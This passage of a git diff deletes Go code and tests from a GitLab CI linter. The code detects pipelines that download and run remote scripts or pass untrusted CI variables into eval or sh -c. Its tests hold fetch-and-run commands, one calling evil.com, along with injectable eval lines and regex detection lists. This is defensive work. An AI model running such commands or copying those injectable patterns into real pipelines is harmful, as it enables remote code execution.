- {"wget -O then sh", "wget -O setup.sh https://example.com/setup.sh && sh setup.sh"},
- {"curl -o then source", "curl -o config.sh https://example.com/config.sh && source config.sh"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"setup": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be flagged, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- if result.Issues[0].PatternType != "download-and-execute" {
- t.Fatalf("expected pattern type 'download-and-execute', got %q", result.Issues[0].PatternType)
- }
- })
- }
-}
-
-// -- Download-redirect-execute patterns --
-
-func TestUnverifiedScripts_DownloadRedirectExecute(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"curl redirect then sh", "curl https://example.com/install > install.sh; sh install.sh"},
- {"wget redirect then bash", "wget https://example.com/setup > setup.sh; bash setup.sh"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"setup": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be flagged, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- if result.Issues[0].PatternType != "download-redirect-execute" {
- t.Fatalf("expected pattern type 'download-redirect-execute', got %q", result.Issues[0].PatternType)
- }
- })
- }
-}
-
-// -- Safe patterns that should NOT be flagged --
-
-func TestUnverifiedScripts_SafePatterns(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"curl to file only", "curl -o installer.sh https://example.com/install.sh"},
- {"wget to file only", "wget https://example.com/setup.sh"},
- {"curl with checksum", "curl -o script.sh https://example.com/script.sh && sha256sum -c script.sh.sha256 && bash script.sh"},
- {"echo with pipe", "echo 'hello world' | bash -c 'cat'"},
- {"cat pipe bash", "cat local_script.sh | bash"},
- {"normal curl POST", "curl -X POST -d '{\"key\": \"value\"}' https://api.example.com"},
- {"apt-get install", "apt-get install -y curl wget"},
- {"pip install", "pip install requests"},
- {"comment line", "# curl https://example.com/install.sh | bash"},
- {"empty line", ""},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 0 {
- t.Fatalf("script %q should be safe, but got %d issues", tt.script, len(result.Issues))
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- })
- }
-}
-
-// -- Trusted URLs --
-
-func TestUnverifiedScripts_TrustedUrls(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{
- Enabled: true,
- TrustedUrls: []string{"https://internal.example.com/*", "https://trusted.io/install.sh"},
- }
-
- tests := []struct {
- name string
- script string
- expectHit bool
- }{
- {"trusted wildcard", "curl -fsSL https://internal.example.com/tools/setup.sh | bash", false},
- {"trusted exact", "curl -fsSL https://trusted.io/install.sh | bash", false},
- {"untrusted", "curl -fsSL https://evil.com/hack.sh | bash", true},
- {"exact does not match subpath", "curl -fsSL https://trusted.io/install.sh/evil | bash", true},
- {"without wildcard does not match subpath", "curl -fsSL https://trusted.io/install.sh/extra | bash", true},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"setup": jobContent})
- result := conf.Run(data)
- if tt.expectHit && len(result.Issues) == 0 {
- t.Fatalf("script %q should be flagged but was not", tt.script)
- }
- if !tt.expectHit && len(result.Issues) > 0 {
- t.Fatalf("script %q should be trusted but got %d issues", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-// -- Global scripts --
-
-func TestUnverifiedScripts_GlobalScripts(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- mergedConf := &gitlab.GitlabCIConf{
- BeforeScript: []interface{}{"curl https://example.com/setup.sh | bash"},
- AfterScript: []interface{}{"wget -qO- https://example.com/cleanup.sh | sh"},
- GitlabJobs: map[string]interface{}{},
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues from global scripts, got %d", len(result.Issues))
- }
- for _, issue := range result.Issues {
- if issue.JobName != "(global)" {
- t.Fatalf("expected job name '(global)', got %q", issue.JobName)
- }
- }
-}
-
-// -- before_script and after_script in jobs --
-
-func TestUnverifiedScripts_JobScriptBlocks(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- jobContent := map[interface{}]interface{}{
- "before_script": []interface{}{"curl https://example.com/pre.sh | bash"},
- "script": []interface{}{"echo 'safe'"},
- "after_script": []interface{}{"wget -qO- https://example.com/post.sh | sh"},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"deploy": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
-
- blocks := map[string]bool{}
- for _, issue := range result.Issues {
- blocks[issue.ScriptBlock] = true
- if issue.JobName != "deploy" {
- t.Fatalf("expected job name 'deploy', got %q", issue.JobName)
- }
- }
- if !blocks["before_script"] || !blocks["after_script"] {
- t.Fatal("expected issues in both before_script and after_script")
- }
-}
-
-// -- Multiple issues in one job --
-
-func TestUnverifiedScripts_MultipleIssuesPerJob(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "curl https://example.com/first.sh | bash",
- "echo 'safe command'",
- "wget -qO- https://example.com/second.sh | sh",
- },
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"multi": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
- if result.Metrics.UnverifiedScriptsFound != 2 {
- t.Fatalf("expected 2 unverified scripts in metrics, got %d", result.Metrics.UnverifiedScriptsFound)
- }
-}
-
-// -- Issue code and DocURL --
-
-func TestUnverifiedScripts_IssueCodeAndDocURL(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{"curl https://example.com/install.sh | bash"},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"install": jobContent})
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
-
- issue := result.Issues[0]
- if issue.Code != CodeUnverifiedScriptExecution {
- t.Fatalf("expected code %s, got %s", CodeUnverifiedScriptExecution, issue.Code)
- }
- if issue.DocURL != CodeUnverifiedScriptExecution.DocURL() {
- t.Fatalf("expected DocURL %s, got %s", CodeUnverifiedScriptExecution.DocURL(), issue.DocURL)
- }
-}
-
-// -- Case insensitivity --
-
-func TestUnverifiedScripts_CaseInsensitive(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"CURL pipe BASH", "CURL -fsSL https://example.com/install.sh | BASH"},
- {"Curl pipe Bash", "Curl -fsSL https://example.com/install.sh | Bash"},
- {"WGET pipe SH", "WGET -qO- https://example.com/setup.sh | SH"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be flagged (case insensitive), expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- })
- }
-}
diff --git a/control/controlGitlabPipelineVariableInjection.go b/control/controlGitlabPipelineVariableInjection.go
deleted file mode 100644
index 432a83e..0000000
--- a/control/controlGitlabPipelineVariableInjection.go
+++ /dev/null
@@ -1,288 +0,0 @@
-package control
-
-import (
- "fmt"
- "regexp"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineVariableInjectionVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineVariableInjectionConf holds the configuration for unsafe variable expansion detection
-type GitlabPipelineVariableInjectionConf struct {
- Enabled bool `json:"enabled"`
- DangerousVariables []string `json:"dangerousVariables"`
- AllowedPatterns []string `json:"allowedPatterns"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineVariableInjectionConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetPipelineMustNotUseUnsafeVariableExpansionConfig()
- if cfg == nil {
- l.Debug("pipelineMustNotUseUnsafeVariableExpansion control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("pipelineMustNotUseUnsafeVariableExpansion.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.DangerousVariables = cfg.DangerousVariables
- p.AllowedPatterns = cfg.AllowedPatterns
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "dangerousVariables": len(p.DangerousVariables),
- "allowedPatterns": len(p.AllowedPatterns),
- }).Debug("pipelineMustNotUseUnsafeVariableExpansion control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineVariableInjectionMetrics holds metrics about unsafe variable expansion detection
-type GitlabPipelineVariableInjectionMetrics struct {
- JobsChecked uint `json:"jobsChecked"`
- TotalScriptLinesChecked uint `json:"totalScriptLinesChecked"`
- UnsafeExpansionsFound uint `json:"unsafeExpansionsFound"`
-}
-
-// GitlabPipelineVariableInjectionResult holds the result of the control
-type GitlabPipelineVariableInjectionResult struct {
- Issues []GitlabPipelineVariableInjectionIssue `json:"issues"`
- Metrics GitlabPipelineVariableInjectionMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineVariableInjectionIssue represents a dangerous variable found in a code-execution context
-type GitlabPipelineVariableInjectionIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
- VariableName string `json:"variableName"`
- ScriptLine string `json:"scriptLine"`
- ScriptBlock string `json:"scriptBlock"` // "script", "before_script", "after_script"
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Patterns that introduce a shell re-interpretation context.
-// A variable expanded by the outer shell and passed to one of these
-// is re-parsed as code, enabling command injection.
-var shellReparsePatterns = []*regexp.Regexp{
- regexp.MustCompile(`\beval\b`),
- regexp.MustCompile(`\bsh\s+-c\b`),
- regexp.MustCompile(`\bbash\s+-c\b`),
- regexp.MustCompile(`\bdash\s+-c\b`),
- regexp.MustCompile(`\bzsh\s+-c\b`),
- regexp.MustCompile(`\bksh\s+-c\b`),
- regexp.MustCompile(`\benvsubst\b.*\|\s*(sh|bash|dash|zsh)`),
- regexp.MustCompile(`\bxargs\s+(sh|bash)\b`),
- regexp.MustCompile(`\bsource\b`),
- regexp.MustCompile(`^\s*\.(\s|$)`),
-}
-
-// isShellReparseContext returns true if the line contains a command that
-// re-interprets its arguments as shell code (eval, sh -c, bash -c, etc.).
-func isShellReparseContext(line string) bool {
- for _, re := range shellReparsePatterns {
- if re.MatchString(line) {
- return true
- }
- }
- return false
-}
-
-// Run executes the unsafe variable expansion detection control.
-//
-// GitLab CI sets CI variables as environment variables; the shell does
-// NOT re-parse expanded values for command substitution. So plain usage
-// like `echo $CI_COMMIT_BRANCH` is safe: the shell treats the expanded
-// value as an inert string.
-//
-// The real injection surface is commands that RE-INTERPRET their input
-// as shell code: eval, sh -c, bash -c, source, etc. A user-controlled
-// variable passed to these is executed as code.
-func (p *GitlabPipelineVariableInjectionConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineVariableInjectionResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineVariableInjection",
- "controlVersion": ControlTypeGitlabPipelineVariableInjectionVersion,
- })
- l.Info("Start unsafe variable expansion detection control")
-
- result := &GitlabPipelineVariableInjectionResult{
- Issues: []GitlabPipelineVariableInjectionIssue{},
- Metrics: GitlabPipelineVariableInjectionMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineVariableInjectionVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Unsafe variable expansion detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if len(p.DangerousVariables) == 0 {
- l.Info("No dangerous variables configured, skipping")
- result.Skipped = true
- return result
- }
-
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- l.Warn("Merged CI configuration not available, cannot check scripts")
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- // Build regexes for each dangerous variable.
- // Match $VAR or ${VAR} ensuring the unbraced form has a word boundary.
- varRegexes := make(map[string]*regexp.Regexp, len(p.DangerousVariables))
- for _, v := range p.DangerousVariables {
- pattern := fmt.Sprintf(`\$(?:\{%s\}|%s(?:[^a-zA-Z0-9_]|$))`, regexp.QuoteMeta(v), regexp.QuoteMeta(v))
- varRegexes[v] = regexp.MustCompile(pattern)
- }
-
- // Compile allowed patterns
- var allowedRegexes []*regexp.Regexp
- for _, pat := range p.AllowedPatterns {
- re, err := regexp.Compile(pat)
- if err != nil {
- l.WithError(err).WithField("pattern", pat).Warn("Invalid allowed pattern, ignoring")
- continue
- }
- allowedRegexes = append(allowedRegexes, re)
- }
-
- // Check global before_script and after_script
- p.scanScriptBlock(mergedConf.BeforeScript, "(global)", "before_script", varRegexes, allowedRegexes, result)
- p.scanScriptBlock(mergedConf.AfterScript, "(global)", "after_script", varRegexes, allowedRegexes, result)
-
- // Check per-job scripts
- for jobName, jobContent := range mergedConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- result.Metrics.JobsChecked++
-
- p.scanScriptBlock(job.Script, jobName, "script", varRegexes, allowedRegexes, result)
- p.scanScriptBlock(job.BeforeScript, jobName, "before_script", varRegexes, allowedRegexes, result)
- p.scanScriptBlock(job.AfterScript, jobName, "after_script", varRegexes, allowedRegexes, result)
- }
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Unsafe variable expansions found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "jobsChecked": result.Metrics.JobsChecked,
- "totalScriptLines": result.Metrics.TotalScriptLinesChecked,
- "unsafeExpansionsFound": result.Metrics.UnsafeExpansionsFound,
- "compliance": result.Compliance,
- }).Info("Unsafe variable expansion detection control completed")
-
- return result
-}
-
-// scanScriptBlock scans a script block for dangerous variables used in
-// shell re-interpretation contexts (eval, sh -c, bash -c, etc.).
-func (p *GitlabPipelineVariableInjectionConf) scanScriptBlock(
- scriptField interface{},
- jobName string,
- blockType string,
- varRegexes map[string]*regexp.Regexp,
- allowedRegexes []*regexp.Regexp,
- result *GitlabPipelineVariableInjectionResult,
-) {
- lines := gitlab.GetScriptLines(scriptField)
- for _, line := range lines {
- result.Metrics.TotalScriptLinesChecked++
-
- trimmed := strings.TrimSpace(line)
- if trimmed == "" || strings.HasPrefix(trimmed, "#") {
- continue
- }
-
- if !isShellReparseContext(trimmed) {
- continue
- }
-
- if isAllowedLine(trimmed, allowedRegexes) {
- continue
- }
-
- for varName, re := range varRegexes {
- if re.MatchString(line) {
- result.Issues = append(result.Issues, GitlabPipelineVariableInjectionIssue{
- Code: CodeUnsafeVariableExpansion,
- DocURL: CodeUnsafeVariableExpansion.DocURL(),
- JobName: jobName,
- VariableName: varName,
- ScriptLine: truncateLine(trimmed, 200),
- ScriptBlock: blockType,
- })
- result.Metrics.UnsafeExpansionsFound++
- }
- }
- }
-}
-
-// isAllowedLine returns true if the line matches any of the allowed patterns
-func isAllowedLine(line string, allowedRegexes []*regexp.Regexp) bool {
- for _, re := range allowedRegexes {
- if re.MatchString(line) {
- return true
- }
- }
- return false
-}
-
-// truncateLine shortens a script line for display, appending "..." if truncated
-func truncateLine(line string, maxLen int) string {
- if len(line) <= maxLen {
- return line
- }
- return line[:maxLen] + "..."
-}
diff --git a/control/controlGitlabPipelineVariableInjection_test.go b/control/controlGitlabPipelineVariableInjection_test.go
deleted file mode 100644
index 2b2ea61..0000000
--- a/control/controlGitlabPipelineVariableInjection_test.go
+++ /dev/null
@@ -1,518 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-func buildPipelineOriginDataWithJobs(jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestVariableInjection_Disabled(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: false,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
- data := buildPipelineOriginDataWithJobs(nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestVariableInjection_NoDangerousVariablesConfigured(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{},
- }
- data := buildPipelineOriginDataWithJobs(nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when no dangerous variables configured")
- }
-}
-
-func TestVariableInjection_NilMergedConf(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when merged conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when merged conf unavailable")
- }
-}
-
-// -- Safe patterns: shell does NOT re-parse expanded env vars --
-
-func TestVariableInjection_EchoIsSafe(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- {"unquoted", "echo $CI_COMMIT_MESSAGE"},
- {"double quoted", `echo "$CI_COMMIT_MESSAGE"`},
- {"braced", "echo ${CI_COMMIT_MESSAGE}"},
- {"braced quoted", `echo "${CI_COMMIT_MESSAGE}"`},
- {"printf", `printf '%s\n' "$CI_COMMIT_MESSAGE"`},
- {"curl data", `curl -d "$CI_COMMIT_MESSAGE" https://example.com`},
- {"git checkout", "git checkout $CI_COMMIT_MESSAGE"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 0 {
- t.Fatalf("script %q should be safe, but got %d issues", tt.script, len(result.Issues))
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- })
- }
-}
-
-// -- Dangerous patterns: commands that re-interpret args as shell code --
-
-func TestVariableInjection_EvalIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_MERGE_REQUEST_TITLE"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- {"eval bare", "eval $CI_MERGE_REQUEST_TITLE"},
- {"eval quoted", `eval "echo $CI_MERGE_REQUEST_TITLE"`},
- {"eval braced", `eval "${CI_MERGE_REQUEST_TITLE}"`},
- {"eval braced no quotes", `eval ${CI_MERGE_REQUEST_TITLE}`},
- {"eval in middle", `RESULT=$(eval "echo $CI_MERGE_REQUEST_TITLE")`},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be dangerous, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-func TestVariableInjection_ShCIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- // sh -c variants
- {"sh -c quoted", `sh -c "echo $CI_COMMIT_BRANCH"`},
- {"sh -c unquoted", `sh -c $CI_COMMIT_BRANCH`},
- {"sh -c braced", `sh -c ${CI_COMMIT_BRANCH}`},
- {"sh -c braced quoted", `sh -c "${CI_COMMIT_BRANCH}"`},
- // bash -c variants
- {"bash -c quoted", `bash -c "deploy $CI_COMMIT_BRANCH"`},
- {"bash -c unquoted", `bash -c $CI_COMMIT_BRANCH`},
- {"bash -c braced quoted", `bash -c "${CI_COMMIT_BRANCH}"`},
- // dash -c variants
- {"dash -c quoted", `dash -c "$CI_COMMIT_BRANCH"`},
- {"dash -c braced", `dash -c ${CI_COMMIT_BRANCH}`},
- // zsh -c variants
- {"zsh -c quoted", `zsh -c "$CI_COMMIT_BRANCH"`},
- {"zsh -c unquoted", `zsh -c $CI_COMMIT_BRANCH`},
- {"zsh -c braced quoted", `zsh -c "${CI_COMMIT_BRANCH}"`},
- // ksh -c variants
- {"ksh -c unquoted", `ksh -c $CI_COMMIT_BRANCH`},
- {"ksh -c quoted", `ksh -c "$CI_COMMIT_BRANCH"`},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"deploy": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be dangerous, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-func TestVariableInjection_XargsShIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- {"xargs sh", `echo "$CI_COMMIT_BRANCH" | xargs sh`},
- {"xargs bash", `echo "$CI_COMMIT_BRANCH" | xargs bash`},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be dangerous, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-func TestVariableInjection_ShellWithoutCFlagIsSafe(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- {"bash filename", `bash "$CI_COMMIT_BRANCH"`},
- {"bash filename braced", `bash ${CI_COMMIT_BRANCH}`},
- {"dash filename", `dash $CI_COMMIT_BRANCH`},
- {"zsh filename", `zsh "$CI_COMMIT_BRANCH"`},
- {"ksh filename", `ksh $CI_COMMIT_BRANCH`},
- {"envsubst no pipe", `envsubst "$CI_COMMIT_BRANCH"`},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 0 {
- t.Fatalf("script %q should be safe (no -c flag), but got %d issues", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-func TestVariableInjection_SourceIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_REF_NAME"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- `source <(echo "$CI_COMMIT_REF_NAME")`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("source with dangerous var should flag, got %d issues", len(result.Issues))
- }
-}
-
-func TestVariableInjection_EnvsubstPipeIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- `envsubst '$CI_COMMIT_MESSAGE' < template.sh | sh`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("envsubst | sh with dangerous var should flag, got %d issues", len(result.Issues))
- }
-}
-
-// -- Aliasing through variables: block does NOT help for eval/sh -c --
-
-func TestVariableInjection_AliasedVarInEvalStillDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- jobContent := map[interface{}]interface{}{
- "variables": map[interface{}]interface{}{
- "BRANCH": "$CI_COMMIT_BRANCH",
- },
- "script": []interface{}{
- `eval "deploy $CI_COMMIT_BRANCH"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"deploy": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("eval with dangerous var should flag even when aliased, got %d issues", len(result.Issues))
- }
-}
-
-// -- Edge cases --
-
-func TestVariableInjection_SkipsComments(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "# eval $CI_COMMIT_MESSAGE",
- " # sh -c $CI_COMMIT_MESSAGE",
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 0 {
- t.Fatalf("comment lines should be skipped, got %d issues", len(result.Issues))
- }
-}
-
-func TestVariableInjection_DoesNotMatchLongerVariable(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "eval $CI_COMMIT_BRANCH_NAME_EXTRA",
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 0 {
- t.Fatalf("longer variable name should not match, got %d issues", len(result.Issues))
- }
-}
-
-func TestVariableInjection_MultipleVarsMultipleJobs(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE", "CI_COMMIT_REF_NAME"},
- }
-
- job1 := map[interface{}]interface{}{
- "script": []interface{}{
- `eval "echo $CI_COMMIT_MESSAGE"`,
- },
- }
- job2 := map[interface{}]interface{}{
- "script": []interface{}{
- `bash -c "deploy $CI_COMMIT_REF_NAME"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{
- "build": job1,
- "deploy": job2,
- })
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
-}
-
-func TestVariableInjection_DetectsInBeforeScript(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_REF_NAME"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "before_script": []interface{}{`sh -c "setup $CI_COMMIT_REF_NAME"`},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"deploy": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].ScriptBlock != "before_script" {
